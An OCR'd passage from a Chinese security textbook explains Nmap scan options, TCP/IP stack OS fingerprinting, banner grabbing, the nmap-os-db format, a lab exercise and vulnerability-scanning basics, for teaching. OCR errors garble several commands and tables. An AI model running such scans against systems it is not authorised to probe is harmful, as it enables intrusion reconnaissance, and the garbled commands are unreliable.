-b <FTP relay host> : FTP bounce scan 


这 些 参数 意义 如 表 2-4 所 示 。 


参 数 


表 2-4 Nmap 命令 的 参数 


-sS/sT/sA/sW/sM 


指定 使 用 TCP SYN/Connect()/ACK/Window/Maimon scans 的 方式 来 对 目标 
主机 进行 扫描 


-sU 指定 使 用 UDP 扫描 方式 确定 目标 主机 的 UDP 端口 状况 

_sN/sF/sX 指定 使 用 TCP Null,FIN 和 Xmas scans 秘密 扫描 方式 来 协助 探测 对 方 的 TCP 
端口 状态 

--scanflags 定制 TCP 包 的 flags 

要 人 scan) 方 式 来 扫描 目标 主机 (前 提 是 找到 合适 的 僵尸 
主机 ) 

sY/sZ 使 用 SCTP INIT/COOKIE-ECHO 来 扫描 SCTP 协议 端口 的 开放 情况 

-sO 使 用 IP 协议 扫描 确定 目标 机 支持 的 协议 类 型 

-b 使 用 FTP 反弹 扫描 (bounce scan) 扫 描 方式 


除了 所 有 前 面 讨论 的 扫描 方法 .Nmap 还 提供 了 选项 用 以 说 明 哪 些 端 口 被 扫描 以 及 扫 
描 是 随机 的 还 是 顺序 进行 。 默认 情况 下 .Nmap 用 指定 的 协议 对 端口 1 一 1024 以 及 nmap- 
services 文件 中 列 出 的 更 高 的 端口 进行 扫描 ,相关 参数 如 下 : 


PORT SPECIFICATION AND SCAN ORDER: 


-p<port ranges> : Only scan specified ports 
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Ex: -p227 =-Dl= 65535; =p U:53,111,137,T:21- 25,80; 139;8080;,S:9 
-了 : Fast mode -Scan fewer ports than the default scan 
-r: Scan ports consecutively - don't randomize 
--top-ports <number> : Scan < number>most common ports 


--port- ratio <ratio> : Scan ports more common than <ratio> 
这 些 参 数 意 义 如 表 2-5 所 示 。 
表 2-5 Nmap 指定 端口 和 扫描 顺序 的 参数 


参 数 释 区 
-p 一 port ranges> 扫描 指定 的 端口 
<- 快速 模式 , 仅 扫描 TOP 100 的 端口 


不 进行 端口 随机 打 乱 的 操作 (如 无 该 参数 ,Nmap 会 将 要 扫描 的 端口 以 随机 
顺序 方式 扫描 ,以 让 Nmap 的 扫描 不 易 被 对 方 防火 墙 检测 到 ) 


扫描 开放 概率 最 高 的 number 个 端口 (Nmap 的 作者 曾经 做 过 大 规模 的 互联 
网 扫描 ,统计 出 网 络 上 各 种 端口 可 能 开放 的 概率 ,以 此 排列 出 最 有 可 能 开放 
端口 的 列表 ,具体 可 以 参见 文件 nmap-services。 默 认 情况 下 ,Nmap 会 扫描 
最 有 可 能 的 1000 个 TCP 端口 ) 
扫描 指定 频率 以 上 的 端口 。 与 -top-ports 类 似 , 这 里 以 概率 作为 参数 ,让 概 
—port-ratio <ratio> 率 大 于 一 port-ratio 的 端口 才 被 扫描 。 显 然 参数 必须 在 0 一 1 之 间 , 具 体 范围 
概率 情况 可 以 查看 nmap-services 文件 


-top-ports <number> 


扫描 局 域 网 内 的 172. 16. 1. 99 主机 端口 .命令 如 下 : 

nmap - SS - SU - T4 -top- ports 300 172.16.1.99 
其 中 ,参数 -sS 表示 使 用 TCP SYN 方式 扫描 TCP 端口 ;-sU 表示 扫描 UDP 端口 ;-T4 表示 
时 间 级 别 配置 为 4 级 ;一 top-ports 300 表示 扫描 最 有 可 能 开放 的 300 个 端口 (TCP 和 UDP 
分 别 有 300 个 端口 )。 

扫描 主机 172. 16. 1. 99 的 所 有 TCP 端口 ,命令 如 下 : 


nmap -Vv 172.16.1.99 


其 中 ,参数 -v 表示 打开 宛 余 模式 。 
若 用 Wireshark 抓 取 数据 包 , 可 观察 到 Nmap 是 如 何 发 送 探测 包 来 获取 扫描 结果 的 。 


2.1.3 操作 系统 扫描 


操作 系统 指纹 识别 一 般 用 来 帮助 识别 某 台 设备 上 运行 的 操作 系统 类 型 。 其 原理 是 : 向 
目标 主机 发 送 带 有 某 些 协议 标记 、 选 项 和 数据 的 数据 包 , 通 过 对 对 方 回 应 包 的 分 析 , 根 据 各 
种 不 同 操作 系统 类 型 和 版 本 实现 机 制 上 的 差异 ,用 特定 方法 推断 目标 主机 所 安装 的 操作 系 
统 类 型 和 版 本 。 例 如 ,根据 协议 栈 实 现 上 的 差异 采用 协议 栈 指 纹 鉴别 ;根据 开放 端口 的 差异 
采用 端口 扫描 ;根据 应 用 服务 的 差异 通过 旗 标 抽取 。 

由 于 绝 大 多 数 安全 漏洞 是 针对 特定 操作 系统 的 ,因此 获知 远程 主机 操作 系统 类 型 和 版 
本 非常 重要 。 例 如 ,在 进行 端口 扫描 时 发 现 端 口 53 打开 了 ,而 且 其 服务 器 是 有 安全 漏洞 的 

。 65 。 


BIND 版 本 (在 Internet 上 DNS 解释 大 部 分 都 是 使 用 Linux 的 BIND, 但 BIND 的 漏洞 很 

多 。 查 看 BIND 版 本 的 命令 是 nslookup -q== txt -class 王 CHAOS version. bind. 172. 16. 2. 

22, 不 过 BIND 信息 可 能 被 隐藏 );。 依 靠 TCP/IP 特征 探测 器 可 以 很 快 获知 远程 主机 运行 的 

操作 系统 及 版 本 ,然后 使 用 相应 的 漏洞 程序 和 shellcode 代码 (shellcode 是 一 段 代码 或 填充 

数据 ,用 来 发 送 到 服务 器 以 利用 特定 漏洞 的 代码 ,一般 是 作为 数据 发 送 给 受 攻 击 服务 的 ,可 

以 获取 权限 。shellcode 代码 通常 用 C 语言 编写 ) ,就 可 以 使 其 进程 崩溃 。 因 此 ,只 有 确定 了 
台 主 机 上 运行 的 操作 系统 类 型 和 版 本 ,才能 进一步 进行 安全 漏洞 发 现 和 渗透 攻击 。 

从 辨识 方式 上 ,操作 系统 类 型 探查 有 主动 和 被 动 之 分 。 主 动 即 主动 向 主机 发 起 连接 ,并 
分 析 收 到 的 响应 ,从 而 确定 操作 系统 类 型 ;而 被 动 则 是 在 网 络 中 监听 ,分 析 系 统 流量 ,用 默认 
值 来 猜测 操作 系统 类 型 的 技术 。 

1. 操作 系统 TCP 和 ICMP 常规 指纹 识别 技术 

操作 系统 对 TCP/IP 的 实现 ,一 般 都 是 严格 遵从 RFC 文档 的 规范 ,因为 必须 遵从 相同 
的 协议 才能 实现 网 络 通信 。 但 是 在 具体 实现 上 还 是 有 略微 的 差别 ,这些 差别 是 在 协议 规范 
之 内 所 允许 的 ,每 个 不 同 的 实现 将 会 拥有 它们 自己 的 特性 (例如 一 些 选择 性 的 特性 被 使 用 ， 
而 其 他 的 一 些 系 统 则 可 能 没有 使 用 ) ,大 多 数 操作 系统 指纹 识别 工具 都 是 基于 这 些 细小 的 差 
别 进行 探测 分 析 的 。 

下 面 是 一 些 相关 的 探测 技术 。(1) 一 (4) 属 于 主动 探测 ,(5) 一 (12) 属 于 被 动 探测 。 

(1) FIN 探测 。 跳 过 TCP 三 次 握手 的 顺序 ,给 目标 主机 发 送 一 个 FIN 包 。 在 RFC793 
中 规定 FIN 数据 包 被 接收 后 ,主机 不 发 送 响应 信息 。 但 是 很 多 系统 由 于 之 前 的 固有 实现 ， 
可 能 会 发 送 一 个 RST 响应 ,比如 MS Windows、BSDI、CISCO、HP/UX、MVS 和 IRIX。 

(2) BOGUS flag 探测 。 发 送 一 个 带 有 未 定义 FLAG 的 TCP SYN 数据 包 , 不 同 的 操作 
系统 会 有 不 同 的 响应 。 

(3) 统计 ICMP Error 报 文 。RFC1812 中 规定 了 ICMP Error 消息 的 发 送 速度 。Linux 
设 定 了 目标 不 可 达 消 息 上 限 为 每 4s 有 80 个 。 操 作 系 统 探测 时 可 以 向 随机 的 高 端 UDP 端 
口 大 量 发 包 , 然 后 统计 收 到 的 目标 不 可 达 消 息 。 用 此 技术 进行 操作 系统 探测 时 时 间 会 长 一 
些 , 因 为 要 大 量 发 包 , 并 且 还 要 等 待 响 应 ,同时 也 可 能 出 现在 网 络 中 丢 包 的 情况 。 

(4) ICMP Error 报 文 引用 。RFC 文件 中 规定 ,ICMP Error 消息 要 引用 导致 该 消息 的 
ICMP 消息 的 部 分 内 容 。 例 如 对 于 端口 不 可 达 消 息 , 某 些 操 作 系 统 返 回收 到 的 IP 头 及 后 续 
的 8B,Solaris 返回 的 Error 消息 中 则 引用 的 内 容 更 多 一 些 , 而 Linux 比 Solaris 还 要 多 。 

(5) ACK 值 。 在 不 同 场景 下 ,针对 不 同 的 请 求 ,操作 系统 对 ACK 值 的 处 理 方式 也 不 一 
样 。 例 如 ,对 一 个 关闭 的 端口 发 送 数据 包 , 有 的 操作 系统 ACK 十 1, 有 的 系统 则 不 变 。 

(6) TCP 初始 化 窗口 尺寸 。 通 过 分 析 响 应 中 的 初始 窗口 大 小 来 猜测 操作 系统 的 技术 
比较 可 靠 ,因为 很 多 操作 系统 的 初始 窗口 尺寸 不 同 。 比 如 AIX 设置 的 初始 窗口 尺寸 是 
0x3F25, 而 OpenBSD、FreeBSD 设置 的 值 是 0x402E,Windows XP 是 0xFFFF。 

(7) DF(Don't Fragment) 位 。 为 了 增进 性 能 , 某 些 操作 系统 在 发 送 的 包 中 设置 了 DF 
位 ,可 以 从 DF 位 的 设置 情况 中 做 大 概 的 判断 。 

(8) TCPISN 采样 。 建 立 TCP 连接 时 ,SYN/ACK 中 初始 序列 号 ISN 的 生成 存在 一 定 
规律 ,比如 固定 不 变 、 随 机 增加 (Solaris、FreeBSD 等 ) 真正 的 随机 值 CLinux 2. 0. * ) 等 ,而 
Windows 使 用 的 是 时 间 相 关 模 型 .ISN 在 每 个 不 同时 间 段 都 有 固定 的 增 量 。 针 对 ISN 做 多 

车 


次 采样 ,然后 比 对 规律 ,可 以 识别 操作 系统 类 型 。 

(9) IPID 抽样 。IP 标识 是 用 来 分 组 数据 包 分 片 的 标志 位 ,和 ISN 一 样 .不同 的 操作 系 
统 初始 化 和 增长 该 标识 值 的 方式 也 不 一 样 。 

(10) TCP Timestamp。 有 的 操作 系统 不 支持 该 特性 ,有 的 操作 系统 以 不 同 的 更 新 频率 
来 更 新 时 间 戳 ,还 有 的 操作 系统 返回 0。 

(11) DHCP。DHCP 本 身 在 RFC 历史 上 经 历 了 1541、2131、2132、4361、4388、4578 多 
个 版 本 ,使 得 应 用 DHCP 进行 操作 系统 识别 成 为 可 能 。 

(12) 数据 包 重 传 延 时 。 由 于 数据 包 丢失 或 者 网 络 阻塞 .TCP 数据 包 重 传 属于 正常 情 
况 。 为 了 识别 重复 的 数据 包 ,TCP 协议 使 用 相同 的 ISN 和 ACK 来 确定 接收 的 数据 包 。 由 
于 不 同 操作 系统 会 选择 采用 自己 的 重 传 延迟 算法 ,这 就 造成 了 通过 分 析 各 系统 重 发 包 的 延 
迟 来 判断 其 操作 系统 类 型 的 可 能 性 ,如 果 各 操作 系统 的 重 传 延迟 相互 存在 各 异性 ,那么 就 很 
容易 将 它们 彼此 区 分 开 来 。 

2. 直接 通过 联接 端口 根据 其 返回 的 信息 来 判 操作 系统 

(1) 如 果 远 程 主机 开放 80 端口 ,可 以 用 telnet 命令 尝试 扫描 它 的 80 端口 : 


C:\>telnet 192.168.1.2 80 
输入 get 回 车 (注意 这 里 是 盲 打 , 即 看 不 到 输入 的 字符 ) ,如果 返回 下 面 的 信息 : 


HTTP/1.1 400 Bad Request 

Server: Microsoft- IIS/5.1 

Date: Mon, 10 Feb 2014 09:53:46 GMT 

Content- Type: text/html 

Content- Length: 87 

<html><head><title> Error< /title>< /head> <body> The parameter is incorrect. < /body> 
</html> 

遗失 对 主机 的 连接 。 


上 面 的 信息 显示 ,这 人 台 主 机 的 操作 系统 是 Windows, 且 安装 了 IIS 5. 1。 

这 种 方法 也 称 "Banner 搜 取 ”, 是 比较 基础 、 简 单 的 指纹 识别 技术 。 其 特点 是 操作 简单 ， 
通常 获取 的 信息 也 相对 准确 。 不 过 ,Banner 可 以 被 修改 或 者 被 禁止 输出 信息 。 

(2) 如 果 远程 主机 开放 了 21 端口 ,可 以 直接 执行 ftp 命令 : 


C:> ftp 172.18.187.231 


如 果 返 回 以 下 信息 : 


连接 到 172.18.187.231 
220 Serv-U FTP Server v6.0 for WinSock ready... 
用 户 (172.18.187.231: (none)): 


则 可 判定 这 是 一 台 Windows 的 主机 ,因为 Serv-U FTP 是 一 个 专 为 Windows 平台 开发 的 
FTP 服务 器 。 
如 果 返 回 的 是 


Connected to 172.18.187.231. 
Cv 


220 (vsFTPd 2.3.5) 
User (172.18.187.23lnone) ) : 


可 判定 这 是 一 台 UNIX 的 主机 。 
(3) 如 果 远 程 主机 开放 了 23 端口 ,可 直接 telnet 该 主机 : 


C:>telnet 172.18.187.231 


如 果 返 回 


Welcome to Microsoft Telnet Service 
login: 

显然 ,这 肯定 是 一 台 Windows 的 主机 。 
如 果 返 回 


Ubuntu 12.04.3 LTS 

login: 
则 这 是 一 台 Ubuntu 主机 ,并 且 版 本 是 12. 04. 3。 

3. 利用 Nmap 工具 探测 操作 系统 

Nmap 最 著名 的 功能 之 一 是 用 TCP/IP 协议 栈 指纹 技术 (fingerprinting) 进 行 远 程 操 
作 系 统 探测 。 所 谓 指纹 , 即 由 特定 的 回复 包 提 取出 的 数据 特征 。 每 个 指纹 包括 一 个 自 
由 格式 的 关于 操作 系统 的 描述 文本 和 一 个 分 类 信息 , 它 提供 供应 商 名 称 ( 如 Sun) ,操作 
系统 名 称 ( 如 Solaris) 及 版 本 (如 10) 以 及 设备 类 型 (通用 设备 、 路 由 器 、 交 换 机 、 游 戏 控 
制 台 等 )。 

在 RFC 规范 中 ,有 些 地 方 对 TCP/IP 的 实现 并 没有 强制 规定 ,由 此 不 同 的 TCP/IP 方 
案 中 可 能 都 有 自己 的 特定 方式 。Nmap 主要 是 根据 这 些 细节 上 的 差异 来 判断 操作 系统 的 类 
型 。 其 实现 方式 如 下 : 

(1) Nmap 内 部 包含 了 2600 多 个 已 知 系统 的 指纹 特征 ,将 此 指纹 数据 库 作 为 进行 指纹 
对 比 的 样本 库 。 

(2) 分 别 挑选 一 个 开放 的 和 关闭 的 端口 ,向 其 发 送 经 过 精心 设计 的 TCP/UDP/ICMP 
数据 包 , 根 据 返回 的 数据 包 生 成 一 份 系统 指纹 。 

(3) 将 探测 生成 的 指纹 与 nmap-os-db 中 的 指纹 进行 对 比 ,查找 匹配 的 系统 。 如 果 无 法 
匹配 ,以 概率 形式 列举 出 可 能 的 系统 。 

Nmap 的 指纹 特征 库 文件 位 于 Nmap 安装 文件 夹 内 的 nmap-os-db 文件 中 。 为 进一步 
了 解 指 纹样 本 ,下 面 摘 取 其 中 一 个 指纹 ,简单 了 解 其 结构 。 

在 指纹 库 中 查找 Windows 7 ,发 现 不 只 一 个 相关 样本 ,现任 取 其 中 一 个 ,内 容 如 下 : 


#Version 6.1 Build 7100 

Fingerprint Microsoft Windows 7 

Class Microsoft | Windows | 7 | general purpose 

CPE cpe:/o:microsoft:windows_7 auto 

SEQ (SP= 100- 10A%GCD= 1- 6%ISR= 107- 111%TI= I%II= I%SS= S$TS= U) 

OPS (O01= M5BANW8NNT11%02=M578NW8%O3= M280NW8NNT11%04= M5BANW8NNT11%05= 
。68 。 


M218NW8NNT11%06=M109NNT11) 

WIN (W1= 2000%W2= 2000%W3= 2000%W4= 2000%W5= 2000%$W6= 2000) 

ECN (R= Y$DF= Y%T= 7B- 85%TG= 80%W= 2000%0=M5BA4NW8%CC= N%$Q= ) 

T1 (R= YEDF=Y%T= 7B- 85%TG= 80%S=O%A= S+ $F= RSSRD= 0%Q= ) 

T2 (R=N) 

T3(R=N) 

T4 (R=N) 

T5 (R= YDF=Y%T= 7B- 85%TG= 80%W= 05S= 2%A= S+ SF= RR3O= SRD= 03$Q= ) 

T6 (R=N) 

T7 (R=N) 

U1 (DF=N%T= 7B- 85%TG= 80%IPIL= 164%UN= 0%RIPL= GSRID= GSRIPCK= G%$RUCK= GSRUD= G) 

IE (DFI=N%T= 7B- 85%TG= 80%CD= 2) 

第 一 行为 注释 行 ,说 明 此 指纹 对 应 的 操作 系统 与 版 本 。 

Fingerprint 关键 字 定 义 一 个 新 的 指纹 , 紧 随 其 后 的 是 指纹 名 字 Microsoft Windows 7。 
显然 ,这 是 一 个 关于 Windows 7 版 本 的 指纹 特征 。 

Class 行 用 于 指定 该 指纹 所 属 的 类 别 ,依次 指定 该 系统 的 Vendor (生产 厂 家 )、OS 
family( 操 作 系 统 类 别 )、OS generation( 第 几 代 操作 系统 ) 和 device type( 设 备 类 型 ), 如 此 处 
Vendor 为 Microsoft, OS family 为 Windows,OS generation 为 7, 设 备 类 型 为 通用 设备 ( 普 
通 PC 或 服务 器 )。 

接 下 来 是 CPE 行 ,此 行 非常 重要 .使 用 CPE(Common Platform Enumeration ,通用 平 
台 枚 举 ) 格 式 描述 该 系统 的 信息 。 以 标准 的 CPE 格式 来 描述 操作 系统 类 型 ,便于 Nmap 与 
外 界 信息 的 交换 ,比如 可 以 很 快 从 网 上 (参考 http://cpe. mitre. org/) 开 源 数 据 库 查 找到 
CPE 描述 的 操作 系统 具体 信息 。 

此 处 作为 指纹 描述 字段 的 CPE 格式 如 下 : 


cpe:/<part> :<vendor> :<product> :<version> :<update> :<edition> :< language> 


接 下 来 从 SEQ 到 IE 的 13 行 都 是 具体 指纹 数据 描述 行 ,在 对 比 指纹 时 ,就 是 对 比 这 
13 行 里 面 的 具体 数据 ,如 果 匹 配 , 则 目标 机 为 指纹 所 描述 的 系统 类 型 。 其 中 ,SEQ 描述 顺序 
产生 方式 , OPS 描述 TCP 包 中 可 选 字段 的 值 WIN 描述 TCP 包 的 初始 窗口 大 小 , ECN 
(Explicit Congestion Notification) 描 述 TCP 明确 指定 拥塞 通知 时 的 特征 ,T1 一 T7 描述 
TCP 回复 包 的 字段 特征 ,U1l 描述 向 关闭 的 UDP 发 包产 生 的 回复 的 特征 ,IE 描述 向 目标 机 
发 送 ICMP 包产 生 的 特征 。 
Tl1~T7 测试 可 归结 如 表 2-6 所 示 。 


表 2-6 TI~T7 测试 


测试 描 述 

T1 发 送 TCP 数据 包 (Flag 二 SYN) 到 开放 的 TCP 端口 上 

T2 发 送 一 个 空 的 TCP 数据 包 到 开放 的 TCP 端口 上 

T3 发 送 TCP 数据 包 (Flag 二 SYN,URG.PSH ,FIN) 到 开放 的 TCP 端口 上 


下 语 电 


测试 描 述 

T4 发 送 TCP 数据 包 (Flag 一 ACK) 到 开放 的 TCP 端口 上 

T5 发 送 TCP 数据 包 (Flag 二 SYN) 到 关闭 的 TCP 端口 上 

T6 发 送 TCP 数据 包 (Flag 二 ACK) 到 关闭 的 TCP 端口 上 

T7 发 送 TCP 数据 包 (Flag=URG,PSH ,FIN) 到 关闭 的 TCP 端口 上 


Nmap 采用 下 列 选项 启用 和 控制 操作 系统 探测 : 


OS DETECTION : 
-0: Enable OS detection 
--osscan- limit: Limit OS detection to promising targets 


- -osscan- guess: Guess 0S more aggressively 

其 意义 如 表 2-7 所 示 。 

表 2-7 Nmap 进行 操作 系统 探测 的 参数 
释 * 


» 
洋 


0 指定 Nmap 进行 操作 系统 探测 

限制 Nmap 只 对 确定 的 主机 进行 操作 系统 探测 (至 少 需 确 知 该 主机 分 别 有 一 个 开 
放 的 和 关闭 的 端口 ) 

大 胆 猜测 对 方 主机 的 系统 类 型 。 由 此 准确 性 会 下 降 不 少 ,但 会 尽 可 能 多 地 为 用 户 
提供 潜在 的 操作 系统 信息 


一 0Sscan-limit 


一 0SScan-guess 


Nmap 操作 系统 探测 的 前 提 是 网 络 环境 的 稳定 性 ,目标 主机 必须 有 一 个 开放 的 TCP 端 
口 .一 个 关闭 的 TCP 端口 和 一 个 关闭 的 UDP 端口 。 否 则 探测 结果 的 精确 度 就 会 有 很 大 程 
度 的 降低 。 例 如 : 


nmap -0 172.16.1.1/24 
表示 对 172. 16. 1. 1 所 在 网 段 的 B 类 255 个 IP 进行 操作 系统 版 本 探测 。 
nmap - SS -0 target .example.com/24 


表示 发 起 对 target. example. com 所 在 网 络 上 的 所 有 255 个 IP 地 址 的 秘密 SYN 扫描 。 同 
时 还 探测 每 台 主 机 操作 系统 的 指纹 特征 。 


nmap - SS -0 --osscan- limit 192.168.1.119/24 


采用 --osscan-limit 这 个 选项 ,Nmap 只 对 满足 "具有 打开 和 关闭 的 端口 条件 的 主机 进行 操 
作 系 统 检测 ,这样 可 以 节约 时 间 , 这 个 选项 仅 在 使 用 -O 或 -A 进行 操作 系统 检测 时 起 作用 。 
【 例 2-4】 分 别 对 目标 机 采用 一 osscan-limit 选项 和 不 采用 此 选项 方式 进行 扫描 ,对 扫 
描 结果 (特别 对 时 间 等 差异 ) 作 出 说 明 。 
为 完成 实验 ,假设 测试 机 系统 均 为 Windows 7, 目 标 机 的 IP 地 址 是 172. 16. 1.171, 实 
验 时 关闭 目标 机 的 防火 墙 (读者 可 自行 完成 开放 防火 墙 的 情况 测试 ) 。 
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(1) 在 测试 机 上 使 用 一 般 方式 对 目标 主机 进行 操作 系统 扫描 : 

nmap -0 172.16.1.1 

(2) 在 测试 机 上 使 用 --osscan-limit 选项 对 目标 主机 进行 操作 系统 扫描 : 
nmap -0 --osscan- limit 172.16.1.1 


读者 可 根据 这 两 次 扫描 结果 进行 分 析 , 比较 其 异同 。 

实验 2-3 操作 系统 指纹 实验 

【实验 目的 】 

(1) 掌握 主机 、 端 口 扫描 的 原理 ,掌握 Nmap 扫描 器 的 使 用 。 

(2) 掌握 Nmap 进行 远程 操作 系统 检测 的 原理 。 

【实验 环境 】 

主机 操作 系统 : Windows 7 (关闭 防火 墙 ) 。 

被 探测 机 : 一 个 已 知 版 本 的 Windows 系统 (虚拟 机 环境 或 真实 环境 )。 

主机 IP: 192. 168. 239.1。 

被 测 机 IP: 192. 168. 239. 128。 

扫描 软件 : Zenmap (官网 下 载 : http://nmap. org/download. html) 。 

数据 包 捕 获 工具 : WireShark 。 

【实验 过 程 】 

(1) 启动 Wireshark ,监控 数据 包 。 

运行 Wireshark, 进 入 captrue 状态 ,截获 所 有 的 主机 与 被 测 机 之 间 的 通信 。 为 减少 截 
获 信息 量 ,建议 仅 保留 主机 与 被 测 机 之 间 的 通信 。 

(2) 执行 Nmap 关于 操作 系统 的 探测 命令 。 

在 Nmap 中 执行 以 下 命令 : 

nmap -0 -v 192.168.239.128 


正常 情况 下 ,Nmap 可 以 成 功 探测 到 被 测 机 的 操作 系统 (读者 自行 贴 出 截图 ) 。 

(3) 捕获 探测 数据 包 。 

此 时 ,正常 情况 下 Wireshark 中 已 经 截获 了 所 有 的 Nmap 发 出 的 报 文 (请 读者 自行 贴 出 
截图 ) 。 

(4) 结合 捕获 的 探测 包 , 分 析 Nmap 操作 系统 指纹 库 的 结构 和 含义 。 

在 这 一 步 ,将 对 照 指纹 库 分 析 截 获 的 报 文 。 

在 Nmap 安装 目录 下 查找 nmap-os-db 文件 ,用 文字 编辑 器 (例如 写字 板 ) 打 开 , 里 面 存 
放 有 2000 多 个 指纹 信息 。 例 如 查找 Windows 7 ,搜索 到 不 只 一 个 相关 指纹 。 不 妨 对 照 截获 
的 报 文 , 选 取 其 中 最 接近 的 一 个 。 

例如 ,选择 下 面 这 个 指纹 特征 : 


#Ver 6.1 (Build 7600) 

Fingerprint Microsoft Windows 7 

Class Microsoft | Windows | 7 | general purpose 
CPE cpe:/o:microsoft:windows 7 auto 


Eo 沁 


SEQ (SP= FC- 106%GCD= 1- 6%ISR= 101- 10B%CI= I%II= I%TS= 7) 

OPS (O01= MAECNW8ST11%02= M4ECNW8ST11%03=M4ECNW8NNT11%04= M4ECNW8ST11%05= 
MA4ECNW8ST11%06= M4ECST11) 

WIN (W1= 2000%$W2= 2000%W3= 2000%W4= 2000%W5= 2000%W6= 2000) 

ECN (R= Y%DF= Y%T= 3B- 45%TG= 40%W= 2000%O=M4ECNW8NNS%$CC= N%Q= ) 

T1 (R= Y%DF= YY%T= 3B- 45%$TG= 40%S=O0%A= S+ SF= ASSRD= 0%Q= ) 

T2 (R= Y%DF= Y$%T= 3B- 45%$TG= 40%W= 0%S= 2%A= SSF= RARSO= SRD= 0%Q= ) 

T3 (R= Y%DF=Y$%T= 3B- 45%$TG= 40%W= 0%S= 2%A= O%F= RARSO= SRD= 0%Q= ) 

T4 (R= Y%DF= Y%T= 3B- 45$TG= 40%W= 0%S= ASA= O%F= RSO= SRD= 0%Q= ) 

TS5 (R= Y%DF= Y%T= 3B- 45$TG= 40%W= 0%S= 2$A= S+ $F= AR%SO= %RD= 0%Q= ) 

T6 (R= Y%DF= Y%T= 3B- 45$TG= 40%W= 0%S= A®SA= O%F= RSO=SRD= 0%Q= ) 

T7 (R= Y%DF= Y%T= 3B- 45$TG= 40%W= 0%S= 2%A= S+ $F= ARSO= SRD= 0%Q= ) 

U1 (DF= N%T= 3B- 45%TG= 40%IPL= 164%UN= 0%RIPL=G%RID=G%RIPCK= G%$RUCK= G%RUD= G) 
IE (DFI=N%T= 3B- 45%TG= 40%CD= 2) 


接 下 来 分 析 指 纹 库 的 含义 ( 按 下 列 顺序 分 析 , 内 容 自 行 补充 ) 。 

© SEQ test。 

© OPS test 。 

@ WIN test。 

@ ECN test。 

© T] test。 

@ T2~T7 test。 

© Ul test。 

人 IE test 。 

【实验 思考 】 

(1) 根据 本 例 实验 的 过 程 , 你 认为 操作 系统 指纹 是 如 何 确定 的 ? 一 个 操作 系统 有 多 个 
样本 的 原因 是 什么 ? 

(2) 仿照 本 例 ,探测 Ubuntu, 并 进行 类 似 的 分 析 。 

在 进行 本 实验 时 ,注意 关闭 被 测 机 和 主机 的 防火 墙 ,以 免 端口 扫描 时 被 过 滤 。 分 析 数 据 
包 时 ,需要 熟悉 TCP、IP 和 ICMP 报 文 头 部 的 详细 结构 。 分 析 指 纹 库 时 ,最 好 参考 Nmap 的 
官方 指导 文档 。 


2.1.4 漏洞 扫描 


漏洞 是 指 硬 件 、 软 件 或 策略 上 存在 的 安全 缺陷 ,从 而 使 得 攻击 者 能 够 在 未 授权 的 情况 下 
访问 、 控 制 系 统 。 漏 洞 扫描 是 指 基于 漏洞 数据 库 , 通 过 扫描 等 手段 对 指定 的 远程 或 者 本 地 计 
算 机 系统 的 安全 脆弱 性 进行 检测 ,发 现 可 利用 的 漏洞 的 一 种 安全 检测 (渗透 攻击 ) 行 为 。 

漏洞 扫描 技术 通过 对 网 络 的 扫描 ,了 解 网 络 的 安全 设置 和 和 运行 的 应 用 服务 ,及 时 发 现 安 
全 漏洞 ,客观 评估 网 络 风险 等 级 。 根 据 扫 描 的 结果 更 正 网 络 安全 漏洞 和 系统 中 的 错误 设置 ， 
可 以 避免 遭受 网 络 的 攻击 。 

漏洞 的 来 源 有 许多 途径 ,主要 有 : @ 编 程 错 误 ,例如 未 对 用 户 输入 数据 的 合法 性 进行 验 
证 ,使 攻击 者 得 以 非法 进入 系统 。@ 安 全 配置 不 当 , 例 如 系统 和 应 用 的 配置 有 误 , 可 能 情况 
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包括 配置 参数 .访问 权限 、 策 略 设置 等 有 误 。 四 软件 日 益 复 杂 ,而 测试 不 完善 ,不 充分 或 缺乏 
安全 测试 。 田 使 用 者 安全 意识 薄弱 ,例如 使 用 过 于 简单 的 口令 。 名 安全 管理 朴 忽 , 重 技术 轻 
管理 ,导致 安全 隐患 。 

由 于 漏洞 的 危害 性 极 大 .为 减少 由 其 带 来 的 危害 和 损失 ,一 般 由 软 硬 件 开发 商 、 安 全 组 
织 . 黑 客 或 用 户 发 布 漏洞 。 漏 洞 内 容 包 括 漏洞 编号 、 发 布 日 期 .安全 危害 级 别 漏洞 名 称 、 漏 
同 影响 平台 、 漏 洞 解决 建议 等 。 例 如 ,CERT 组 织 发 布 漏洞 的 网 址 是 http://www/cert. 
org,Security Focus 公司 漏洞 数据 库 的 网 址 是 http://www. securityfocus. com 等 。 

依据 扫描 执行 方式 不 同 ,漏洞 扫描 主要 分 为 针对 网 络 的 扫描 \ 针 对 主机 的 扫描 \ 针 对 数 
据 库 的 扫描 。 此 外 还 有 针对 Web 应 用 、 中 间 件 的 扫描 等 。 

基于 网 络 的 扫描 器 就 是 通过 网 络 来 扫描 远程 计算 机 中 的 漏洞 ,可 以 看 作 一 种 漏洞 信息 
收集 ,根据 不 同 漏洞 的 特性 构造 网 络 数据 包 ,发 给 网 络 中 的 一 个 或 多 个 目标 服务 器 ,以 判断 
某 个 特定 的 漏洞 是 否 存在 ;而 基于 主机 的 扫描 器 则 是 在 目标 系统 上 安装 了 一 个 代理 (agent) 
或 者 服务 (services) ,以 便 能 够 访问 所 有 的 文件 与 进程 ,这 也 使 得 基于 主机 的 扫描 器 能 够 扫 
描 到 更 多 的 漏洞 。 显 而 易 见 ,基于 网 络 的 漏洞 扫描 器 在 操作 过 程 中 不 需要 涉及 目标 系统 的 
管理 员 权 限 ,在 检测 过 程 中 不 需要 在 目标 系统 上 安装 任何 东西 。 

目前 主流 数据 库 的 自身 漏洞 逐步 暴露 ,数量 庞大 , 仅 CVE 公布 的 Oracle 漏洞 数 已 达 一 
千 多 个 。 数 据 库 漏 洞 扫描 可 以 检测 出 数据 库 的 DBMS 漏洞 .默认 配置 .权限 提升 漏洞 ,缓冲 
区 溢出 、 补 丁 未 升级 等 自身 漏洞 。 

漏洞 扫描 技术 的 主要 流程 如 下 : 

(1) 主机 扫描 : 确定 在 目标 网 络 上 的 主机 是 否 在 线 (参照 2. 1 节 的 内 容 ) 。 

(2) 端口 扫描 : 发 现 远 程 主机 开放 的 端口 以 及 服务 (参照 2. 2 节 的 内 容 ) 。 

(3) 操作 系统 识别 技术 : 根据 信息 和 协议 栈 判别 操作 系统 (参照 2. 3 节 的 内 容 )。 

(4) 漏洞 检测 数据 采集 技术 : 根据 目标 系统 的 操作 系统 平台 和 提供 的 网 络 服务 ,调用 
漏洞 资料 库 中 已 知 的 各 种 漏洞 进行 逐一 检测 ,通过 对 探测 响应 数据 包 的 分 析 判 断 是 否 存在 
漏洞 。 

